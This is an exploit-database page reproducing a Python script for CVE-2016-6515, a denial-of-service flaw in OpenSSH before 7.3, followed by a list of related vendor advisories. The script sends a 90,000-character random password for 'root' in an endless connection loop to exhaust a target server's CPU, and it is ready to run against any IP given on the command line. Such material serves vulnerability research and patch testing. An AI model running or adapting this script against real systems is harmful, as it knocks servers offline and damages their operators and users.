Lucene search
Kashinath TPACKETSTORM:140070HistoryDec 08, 2016 - 12:00 a.m.
OpenSSH 7.2 Denial Of Service
2016-12-0800:00:00
Kashinath T
packetstormsecurity.com
6444
0.045 Low
EPSS
Percentile
91.6%
`################################################################################
# Title : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
# Author : Kashinath T ([email protected]) (www.secpod.com)
# Vendor : http://www.openssh.com/
# Software : http://www.openssh.com/
# Version : OpenSSH before 7.3
# Tested on : Ubuntu 16.04 LTS, Centos 7
# CVE : CVE-2016-6515
# Date : 20-10-2016
#
# NOTE:
# If the remote machine is installed and running OpenSSH version prior to 7.3,
# it does not limit the password length for authentication. Hence, to exploit
# this vulnerability' we will send a crafted data which is of 90000 characters
# in length to the 'password' field while attempting to log in to a remote
# machine via ssh with username as 'root'.
#
# For more info refer,
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
################################################################################
import sys
from random import choice
from string import lowercase
try:
import paramiko
except ImportError:
print "[-] python module 'paramiko' is missing, Install paramiko with" \
" following command 'sudo pip install paramiko'"
sys.exit(0)
class ssh_exploit:
def __init__(self):
"""
Initialise the objects
"""
def ssh_login(self, remote_ip):
try:
# Crafted password of length 90000
passwd_len = 90000
crafted_passwd = "".join(choice(lowercase)
for i in range(passwd_len))
# Connect to a remote machine via ssh
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# calling connect in infinite loop
print "[+] Entering infinite loop"
while 1:
ssh.connect(remote_ip, username='root',
password=crafted_passwd)
except Exception, msg:
print "Error in connecting to remote host : ", remote_ip
print "Exception in : ssh_login method."
sys.exit(msg)
def main():
if len(sys.argv) != 2:
print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
sys.exit()
# Calling ssh_connect
ref_obj = ssh_exploit()
ref_obj.ssh_login(sys.argv[1])
if __name__ == "__main__":
main()
`
Related
openvas
openvas
Fedora Update for openssh FEDORA-2016-4a3debc3a6
2016-08-11 00:00:00
F5 BIG-IP - SOL31510510 - OpenSSH vulnerability CVE-2016-6515
2016-10-24 00:00:00
OpenSSH Denial of Service And User Enumeration Vulnerabilities (Linux)
2016-08-25 00:00:00
nessus
nessus
FreeBSD : FreeBSD -- OpenSSH Denial of Service vulnerability (6ed5c5e3-a840-11e7-b5af-a4badb2f4699)
2017-10-04 00:00:00
Fedora 24 : openssh (2016-4a3debc3a6)
2016-08-11 00:00:00
F5 Networks BIG-IP : OpenSSH vulnerability (K31510510)
2016-10-20 00:00:00
f5
f5
SOL31510510 - OpenSSH vulnerability CVE-2016-6515
2016-10-19 00:00:00
K31510510 : OpenSSH vulnerability CVE-2016-6515
2016-10-19 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-17:06.openssh
2017-08-10 00:00:00
ibm
ibm
checkpoint_advisories
checkpoint_advisories
OpenSSH sshd auth_passwd Denial of Service (CVE-2016-6515)
2017-01-08 00:00:00
osv
osv
openssh - security update
2016-08-12 00:00:00
CVE-2016-6515
2016-08-07 21:59:00
openssh - security update
2018-09-10 00:00:00
debiancve
debiancve
CVE-2016-6515
2016-08-07 21:59:00
zdt
zdt
OpenSSH 7.2 - Denial of Service Exploit
2016-12-07 00:00:00
cve
cve
CVE-2016-6515
2016-08-07 21:59:00
alpinelinux
alpinelinux
CVE-2016-6515
2016-08-07 21:59:00
exploitpack
exploitpack
OpenSSH 7.2 - Denial of Service
2016-12-07 00:00:00
debian
debian
[SECURITY] [DLA 594-1] openssh security update
2016-08-12 21:55:19
[SECURITY] [DLA 1500-1] openssh security update
2018-09-10 08:44:17
fedora
fedora
[SECURITY] Fedora 24 Update: openssh-7.2p2-12.fc24
2016-08-10 07:24:41
redhatcve
redhatcve
CVE-2016-6515
2016-08-08 09:19:32
prion
prion
Authentication flaw
2016-08-07 21:59:00
freebsd
freebsd
FreeBSD -- OpenSSH Denial of Service vulnerability
2017-08-10 00:00:00
ubuntucve
ubuntucve
CVE-2016-6515
2016-08-07 00:00:00
exploitdb
exploitdb
OpenSSH 7.2 - Denial of Service
2016-12-07 00:00:00
ubuntu
ubuntu
OpenSSH vulnerabilities
2016-08-15 00:00:00
cloudfoundry
cloudfoundry
USN-3061-1 OpenSSH vulnerability | Cloud Foundry
2016-08-25 00:00:00
mageia
mageia
Updated openssh packages fix security vulnerability
2016-08-31 18:32:33
symantec
symantec
SA136 : OpenSSH Vulnerabilities
2016-12-13 08:00:00
aix
aix
AIX OpenSSH Vulnerability
2016-09-08 14:36:37
oraclelinux
oraclelinux
openssh security, bug fix, and enhancement update
2017-08-07 00:00:00
amazon
amazon
Medium: openssh
2017-10-03 11:00:00
redhat
redhat
(RHSA-2017:2029) Moderate: openssh security, bug fix, and enhancement update
2017-08-01 05:57:17
centos
centos
openssh, pam_ssh_agent_auth security update
2017-08-24 01:40:16
rosalinux
rosalinux
Advisory ROSA-SA-2021-1938
2021-07-02 17:38:20
ics
ics
Siemens SCALANCE X-200RNA Switch Devices
2022-12-19 12:00:00
oracle
oracle
Oracle Critical Patch Update - October 2017
2017-10-17 00:00:00